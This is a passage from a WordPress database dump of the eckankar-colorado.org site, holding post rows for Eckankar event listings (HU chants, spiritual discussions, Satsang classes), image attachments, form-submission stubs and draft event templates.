PERSON<br>\'Experience HU, The Sound of Soul\'','','publish','closed','closed','','pagosa-springs-in-personexperience-hu-the-sound-of-soul-2','','','2022-02-24 17:23:30','2022-02-25 00:23:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266211',0,'mec-events','',0),(266212,2,'2022-01-23 20:43:39','2022-01-24 03:43:39','<p><span style=\"font-size: 20pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\"><strong><span id=\"page3R_mcid16\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\"><br />\r\nOPEN TO PEOPLE OF ALL BELIEFS AND FAITHS</span></span></strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong><br />\r\nCOVID-19 Safety Measures<br />\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>','Pagosa Springs-IN PERSON<br>\'Experience HU, The Sound of Soul\'','','publish','closed','closed','','pagosa-springs-in-personexperience-hu-the-sound-of-soul-3','','','2022-03-15 18:51:30','2022-03-16 00:51:30','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266212',0,'mec-events','',0),(266215,0,'2022-01-28 21:57:53','2022-01-29 04:57:53','','','','publish','closed','closed','','266215','','','2022-01-28 21:57:53','2022-01-29 04:57:53','',0,'https://eckankar-colorado.org/nf_sub/266215/',0,'nf_sub','',0),(266216,0,'2022-01-30 22:26:30','2022-01-31 05:26:30','','','','publish','closed','closed','','266216','','','2022-01-30 22:26:30','2022-01-31 05:26:30','',0,'https://eckankar-colorado.org/nf_sub/266216/',0,'nf_sub','',0),(266217,2,'2022-01-31 13:56:53','2022-01-31 20:56:53','','gatewa-1y-steps','','inherit','closed','closed','','gatewa-1y-steps','','','2022-01-31 13:56:53','2022-01-31 20:56:53','',266169,'https://eckankar-colorado.org/wp-content/uploads/2022/01/gatewa-1y-steps.jpg',0,'attachment','image/jpeg',0),(266219,2,'2022-02-01 14:34:25','2022-02-01 21:34:25','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-boldgrid-hydra','','','2022-02-01 14:34:25','2022-02-01 21:34:25','',0,'https://eckankar-colorado.org/wp-global-styles-boldgrid-hydra/',0,'wp_global_styles','',0),(266225,2,'2022-02-01 14:44:54','2022-02-01 21:44:54','','meetup-hmpg-row-of-3','','inherit','closed','closed','','meetup-hmpg-row-of-3','','','2022-02-01 14:44:54','2022-02-01 21:44:54','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/02/meetup-hmpg-row-of-3.png',0,'attachment','image/png',0),(266226,2,'2022-02-01 14:47:25','2022-02-01 21:47:25','','podcast-hmpg-row-of-3','','inherit','closed','closed','','podcast-hmpg-row-of-3','','','2022-02-01 14:47:25','2022-02-01 21:47:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/02/podcast-hmpg-row-of-3.png',0,'attachment','image/png',0),(266227,2,'2022-02-01 14:48:05','2022-02-01 21:48:05','','eck-blog-hmpg-row-of-3','','inherit','closed','closed','','eck-blog-hmpg-row-of-3','','','2022-02-01 14:48:05','2022-02-01 21:48:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/02/eck-blog-hmpg-row-of-3.png',0,'attachment','image/png',0),(266228,2,'2022-02-01 14:48:47','2022-02-01 21:48:47','','eck-books-hmpg-row-of-3','','inherit','closed','closed','','eck-books-hmpg-row-of-3','','','2022-02-01 14:48:47','2022-02-01 21:48:47','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/02/eck-books-hmpg-row-of-3.png',0,'attachment','image/png',0),(266229,2,'2022-02-01 14:48:57','2022-02-01 21:48:57','','esc-temple-hmpg-row-of-3','','inherit','closed','closed','','esc-temple-hmpg-row-of-3','','','2022-02-01 14:48:57','2022-02-01 21:48:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/02/esc-temple-hmpg-row-of-3.png',0,'attachment','image/png',0),(266230,2,'2022-02-01 14:49:07','2022-02-01 21:49:07','','hu-song-hmpg-row-of-3','','inherit','closed','closed','','hu-song-hmpg-row-of-3','','','2022-02-01 14:49:07','2022-02-01 21:49:07','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/02/hu-song-hmpg-row-of-3.png',0,'attachment','image/png',0),(266250,15,'2022-02-01 22:33:46','2022-02-02 05:33:46','<p><span style=\"font-size: 14pt;\"><strong>What does it mean to walk your own path to God?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>How do you open yourself to Divine Love?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\"><strong>What does it mean to be truly awake?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">You are warmly welcomed to this spiritual discussion. We will be exploring techniques to discover ways to awaken to Divine Love in our daily lives. Our goal is that each participant will grow in their capacity to recognize and accept Divine Love in their lives.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">Harold Klemp says in his book, <em>The Loving Heart, </em></span><span style=\"font-size: 12pt;\">“The highest love is a pure love for God. A pure love for another is the same as a pure love for God. There is no difference.”  </span><span style=\"font-size: 12pt;\">All are welcome.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span><br />\r\n<br />\r\n<span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.thesoundofsoul.org/\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p>&nbsp;</p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/283608093/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - <br>12 Gifts of Spiritual Living: Awakening to Divine Love','','publish','closed','closed','','online-meetup-12-gifts-of-spiritual-living-awakening-to-divine-love','','','2022-02-01 22:33:46','2022-02-02 05:33:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266250',0,'mec-events','',0),(266261,0,'2022-02-04 11:15:52','2022-02-04 18:15:52','','','','publish','closed','closed','','266261','','','2022-02-04 11:15:52','2022-02-04 18:15:52','',0,'https://eckankar-colorado.org/nf_sub/266261/',0,'nf_sub','',0),(266263,0,'2022-02-08 14:40:09','2022-02-08 21:40:09','','','','publish','closed','closed','','266263','','','2022-02-08 14:40:09','2022-02-08 21:40:09','',0,'https://eckankar-colorado.org/nf_sub/266263/',0,'nf_sub','',0),(266265,0,'2022-02-10 19:42:22','2022-02-11 02:42:22','','','','publish','closed','closed','','266265','','','2022-02-10 19:42:22','2022-02-11 02:42:22','',0,'https://eckankar-colorado.org/nf_sub/266265/',0,'nf_sub','',0),(266266,0,'2022-02-13 07:14:14','2022-02-13 14:14:14','','','','publish','closed','closed','','266266','','','2022-02-13 07:14:14','2022-02-13 14:14:14','',0,'https://eckankar-colorado.org/nf_sub/266266/',0,'nf_sub','',0),(266267,0,'2022-02-13 09:22:14','2022-02-13 16:22:14','','','','publish','closed','closed','','266267','','','2022-02-13 09:22:14','2022-02-13 16:22:14','',0,'https://eckankar-colorado.org/nf_sub/266267/',0,'nf_sub','',0),(266268,0,'2022-02-13 09:59:35','2022-02-13 16:59:35','','','','publish','closed','closed','','266268','','','2022-02-13 09:59:35','2022-02-13 16:59:35','',0,'https://eckankar-colorado.org/nf_sub/266268/',0,'nf_sub','',0),(266269,0,'2022-02-13 10:25:11','2022-02-13 17:25:11','','','','publish','closed','closed','','266269','','','2022-02-13 10:25:11','2022-02-13 17:25:11','',0,'https://eckankar-colorado.org/nf_sub/266269/',0,'nf_sub','',0),(266270,0,'2022-02-13 11:13:54','2022-02-13 18:13:54','','','','publish','closed','closed','','266270','','','2022-02-13 11:13:54','2022-02-13 18:13:54','',0,'https://eckankar-colorado.org/nf_sub/266270/',0,'nf_sub','',0),(266277,2,'2022-02-17 09:55:08','2022-02-17 16:55:08','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 60px; padding-bottom: 50px;\">\r\n<div class=\"nf-field-element\"></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p class=\"\">[ninja_form id=53]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Update Contact Information','','publish','closed','closed','','update-email-or-mail-address-public','','','2022-02-17 10:03:46','2022-02-17 17:03:46','',0,'https://eckankar-colorado.org/?page_id=266277',0,'page','',0),(266281,2,'2023-10-20 09:43:11','2022-02-17 17:09:03','','Update Your Contact Information','','publish','closed','closed','','update-your-contact-information','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=266281',11,'nav_menu_item','',0),(266282,2,'2022-02-17 10:42:34','2022-02-17 17:42:34','','','','publish','closed','closed','','266282','','','2022-02-17 10:42:34','2022-02-17 17:42:34','',0,'https://eckankar-colorado.org/nf_sub/266282/',0,'nf_sub','',0),(266285,0,'2022-02-18 08:49:33','2022-02-18 15:49:33','','','','publish','closed','closed','','266285','','','2022-02-18 08:49:33','2022-02-18 15:49:33','',0,'https://eckankar-colorado.org/nf_sub/266285/',0,'nf_sub','',0),(266292,15,'2022-02-20 11:18:26','2022-02-20 18:18:26','<p><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" title=\"www.TheSoundofSoul.org\" href=\"http://www.TheSoundofSoul.org\" target=\"_blank\" rel=\"noopener\">The Sound of Soul</a>.</span></p>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br />\r\n<br />\r\n</span></strong></span></span>[ninja_form id=44]</p>','ONLINE - Experience HU, The Sound of Soul','','publish','closed','closed','','online-experience-hu-the-sound-of-soul-2','','','2022-02-20 11:18:26','2022-02-20 18:18:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266292',0,'mec-events','',0),(266293,15,'2022-02-20 11:37:55','2022-02-20 18:37:55','<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Do you want to better recognize the gifts from spirit in your daily life?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Would you like to be a clearer channel of love to others?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to either question, this ECK Light and Sound Service will help you see the gifts that surround you and how to shine your unique light of love every day. You will hear inspiring spiritual stories, experience the HU Chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp writes in his book <em>How to Survive Spiritually in Our Times</em>:</span></p>\r\n<blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">A gift of love takes the awareness to see it, to recognize it. These gifts of the Holy Spirit are around you every day. In fact, you are sitting in the middle of thousands of gifts of love at this moment. You are a gift to others you meet, but only if you act in the spirit of light and truth. Act in the highest interest.</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"color: #23507d;\"><strong><span style=\"font-size: 14pt;\">For those who cannot attend in person, you are welcome to attend online.  To get the </span></strong></span><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #23507d; font-size: 14pt;\">Zoom login information, just fill out the form below. Hope to see you there!</span><br />\r\n</strong>[ninja_form id=46]<br />\r\n</span><!-- REGISTRATION SHORTCODE --></span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong> COVID-19 Safety Measures<br />\r\n</strong></span><span style=\"font-size: 12pt;\"><strong>***</strong><em>We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>','In Person & OnLine - <br>ECK Light and Sound Service<br> Is This a Gift from God?','','publish','closed','closed','','in-person-eck-light-and-sound-service-is-this-a-gift-from-god','','','2022-02-28 18:00:49','2022-03-01 01:00:49','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266293',0,'mec-events','',0),(266294,15,'2022-02-20 11:28:10','2022-02-20 18:28:10','','FlowerELSS','','inherit','closed','closed','','flowerelss','','','2022-02-20 11:28:10','2022-02-20 18:28:10','',266293,'https://eckankar-colorado.org/wp-content/uploads/2022/02/FlowerELSS.webp',0,'attachment','image/webp',0),(266296,2,'2022-02-24 15:20:43','2022-02-24 22:20:43','<p><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Enjoy listening or sharing your spiritual experiences, insights, and questions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome. </span><span style=\"font-size: 14pt;\">Come and enjoy spending time with like-minded people.<br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n\r\n<p><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>','IN PERSON -  Roundtable Discussion<br>“Your Next Step Spiritually”','','publish','closed','closed','','in-person-roundtable-discussionyour-next-step-spiritually','','','2022-02-24 16:48:08','2022-02-24 23:48:08','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266296',0,'mec-events','',0),(266298,15,'2022-02-24 17:32:57','2022-02-25 00:32:57','<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Inner Guidance is our divine birthright!</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Anyone can receive this guidance through dreams, intuition, the voice of God, and many other avenues.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We can tune into these types of experiences by learning how to connect with our ever-present divine guidance, often called the Holy Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">During this in-person discussion offered by the Spiritual Experiences Group of Pagosa Springs, we will discover how to listen to the Voice of God, work with an inner guide, and benefit from dreams, waking dreams, and golden-tongued wisdom. You will learn how to ignite your creativity to solve problems.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to join us for a very creative and lively discussion on Sunday, March 27th at 1:00 PM. The location is the Pagosa Lakes Property Owners Association Club House, 240 Port Ave.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom. People of all faiths and beliefs are welcome.</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> <em>We are following the current Archuleta County guidelines for all in person events in Pagosa Springs, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p>&nbsp;</p>','Pagosa Springs - IN PERSON <br>Inner Guidance - Your Divine Birthright','','publish','closed','closed','','pagosa-springs-in-person-inner-guidance-your-divine-birthright','','','2022-02-24 17:32:57','2022-02-25 00:32:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266298',0,'mec-events','',0),(266299,15,'2022-02-24 16:52:08','2022-02-24 23:52:08','','ExperienceHu2','','inherit','closed','closed','','experiencehu2','','','2022-02-24 16:52:08','2022-02-24 23:52:08','',266298,'https://eckankar-colorado.org/wp-content/uploads/2022/02/ExperienceHu2.webp',0,'attachment','image/webp',0),(266301,0,'2022-02-25 12:28:13','2022-02-25 19:28:13','','','','publish','closed','closed','','266301','','','2022-02-25 12:28:13','2022-02-25 19:28:13','',0,'https://eckankar-colorado.org/nf_sub/266301/',0,'nf_sub','',0),(266302,0,'2022-02-25 16:27:52','2022-02-25 23:27:52','','','','publish','closed','closed','','266302','','','2022-02-25 16:27:52','2022-02-25 23:27:52','',0,'https://eckankar-colorado.org/nf_sub/266302/',0,'nf_sub','',0),(266307,0,'2022-02-28 18:19:50','2022-03-01 01:19:50','','','','publish','closed','closed','','266307','','','2022-02-28 18:19:50','2022-03-01 01:19:50','',0,'https://eckankar-colorado.org/nf_sub/266307/',0,'nf_sub','',0),(266308,2,'2022-03-02 08:38:14','2022-03-02 15:38:14','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Event Is Available To Members Of Eckankar -</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 16pt;\">Join your fellow chelas on Zoom for a deep dive on the topic of “Spiritual Self-Confidence”.</span></p>\r\n<p><span style=\"font-size: 16pt;\"><strong>What is the meaning of spiritual self-confidence? </strong><br />\r\n<strong>How do you stay detached in a world where so many negative events occur on a regular basis?</strong><br />\r\n</span><span style=\"font-size: 14pt;\"> </span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\"><span style=\"font-size: 14pt;\">When one attends an ECK Satsang, he becomes refined in the presence of others and moves in grace toward becoming an instrument of the Sugmad. He becomes closer to the Mahanta in spirit and they can communicate secretly. The relationship between the two is of a love greater than words can express; it is the highest of any love.</span><br />\r\n<p><span style=\"font-size: 14pt; color: #666666;\">— The<em> Shariyat-Ki-Sugmad</em>, Book One, pp. 224-225<br />\r\n</span></p>\r\n</blockquote>\r\n<p><span style=\"font-size: 14pt;\">The Satsang Intensives will be hour-long experiential events exploring the ECK works. They will include time for discussion and sharing in small groups, spiritual exercises, and contemplation.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These will be offered quarterly on third Sundays on different topics. No advance preparation or pre-registration is necessary.</span></p>\r\n<p>[ninja_form id=54]</p>','ONLINE - Statewide Satsang Intensive','','publish','closed','closed','','online-statewide-satsang-intensive','','','2022-03-02 09:10:18','2022-03-02 16:10:18','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266308',0,'mec-events','',0),(266310,2,'2022-03-02 09:06:10','2022-03-02 16:06:10','','','','publish','closed','closed','','266310','','','2022-03-02 09:06:10','2022-03-02 16:06:10','',0,'https://eckankar-colorado.org/nf_sub/266310/',0,'nf_sub','',0),(266311,2,'2023-08-31 12:45:03','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\n</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>','ROUNDTABLE TEMPLATE - We don\'t use that term \"Roundtable\" anymore - it\'s a Spiritual Discussion | Title Goes Here','','draft','closed','closed','','','','','2023-08-31 12:45:03','2023-08-31 18:45:03','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266311',0,'mec-events','',0),(266312,2,'2022-03-02 09:27:25','2022-03-02 16:27:25','<p><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Explore a spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide, a specially trained member of the ECK clergy. Listen or share your spiritual experiences, insights, and questions in a relaxed atmosphere.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome. </span><span style=\"font-size: 14pt;\">Come and enjoy spending time with like-minded people.<br />\r\n</span></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br />\r\n**</strong> We are following the current Jefferson County guidelines for all in person events at the Colorado ECK Temple in Lakewood, CO. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health. </span></p>\r\n<p>&nbsp;</p>','IN PERSON - Roundtable Discussion<br>\'Recognizing Gifts from God\'','','publish','closed','closed','','in-person-roundtable-discussiontesting','','','2022-03-23 14:56:55','2022-03-23 20:56:55','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266312',0,'mec-events','',0),(266315,2,'2022-03-02 09:54:14','2022-03-02 16:54:14','<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 14pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 14pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online ECK Satsang Class<br>\'Letters of Light and Sound 2\'','','publish','closed','closed','','online-eck-satsang-classletters-of-light-and-sound-2','','','2022-03-02 09:59:41','2022-03-02 16:59:41','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266315',0,'mec-events','',0),(266316,2,'2023-08-27 11:28:57','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Event Is Available To Members Of Eckankar -</span><br>\r\n</strong></span></p>\r\n<p><span style=\"font-size: 16pt;\">Join your fellow chelas on Zoom for a deep dive on the topic of “Spiritual Self-Confidence”.</span></p>\r\n<p><span style=\"font-size: 16pt;\"><strong>What is the meaning of spiritual self-confidence? </strong><br>\r\n<strong>How do you stay detached in a world where so many negative events occur on a regular basis?</strong><br>\r\n</span><span style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\"><span style=\"font-size: 14pt;\">When one attends an ECK Satsang, he becomes refined in the presence of others and moves in grace toward becoming an instrument of the Sugmad. He becomes closer to the Mahanta in spirit and they can communicate secretly. The relationship between the two is of a love greater than words can express; it is the highest of any love.</span><br>\r\n<p><span style=\"font-size: 14pt; color: #666666;\">— The<em> Shariyat-Ki-Sugmad</em>, Book One, pp. 224-225<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The Satsang Intensives will be hour-long experiential events exploring the ECK works. They will include time for discussion and sharing in small groups, spiritual exercises, and contemplation.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These will be offered quarterly on third Sundays on different topics. No advance preparation or pre-registration is necessary.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','SATSANG INTENSIVE TEMPLATE - (Only for MEMBERS Calendar) | Title Goes Here','','draft','closed','closed','','','','','2023-08-27 11:28:57','2023-08-27 17:28:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266316',0,'mec-events','',0),(266318,2,'2022-03-02 11:47:47','2022-03-02 18:47:47','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Event Is Available To High Initiates in Eckankar -</span><br>\r\n</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">An High Initiate Book discussion meeting is an opportunity for ECK High Initiates (5th Initiation and above) to gather together for spiritual discussion and fellowship</span>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Adventures in Spiritual Leadership - Online - H.I. Book Discussion','','publish','closed','closed','','online-h-i-book-discussion','','','2023-07-29 11:57:19','2023-07-29 17:57:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266318',0,'mec-events','',0),(266319,0,'2022-03-02 15:11:14','2022-03-02 22:11:14','','','','publish','closed','closed','','266319','','','2022-03-02 15:11:14','2022-03-02 22:11:14','',0,'https://eckankar-colorado.org/nf_sub/266319/',0,'nf_sub','',0),(266320,15,'2022-03-03 08:26:36','2022-03-03 15:26:36','<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Do you want to be more awake and aware?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Are you looking for physical, emotional, or spiritual healing?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Are you in search of greater truth?</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Are you looking for your own true spiritual path?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly welcomed to this spiritual discussion. We will be exploring techniques to discover ways to answer these questions and more. Our goal is that each participant will see the value of spiritual exercises to improve their lives.</span></p>\r\n<blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“The Spiritual Exercises of ECK (Spirit) give you confidence in yourself. You learn that you are Soul, you are eternal. Then you know with certainty that you live forever, that death cannot destroy you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The spiritual exercises work similarly to physical exercises. If you want your body to be strong and healthy, you’ve got to swim or run or do something to keep fit. For the Soul body, you do the Spiritual Exercises of ECK, a form of inner communication also called contemplation.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">These spiritual exercises link you with the guidance of the Holy Spirit, which is seen as Light and heard as Sound. The inner Sound is the Voice of God calling us home. The inner Light is a beacon to light our way. All the Spiritual Exercises of ECK are built on these two divine aspects of the Holy Spirit.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 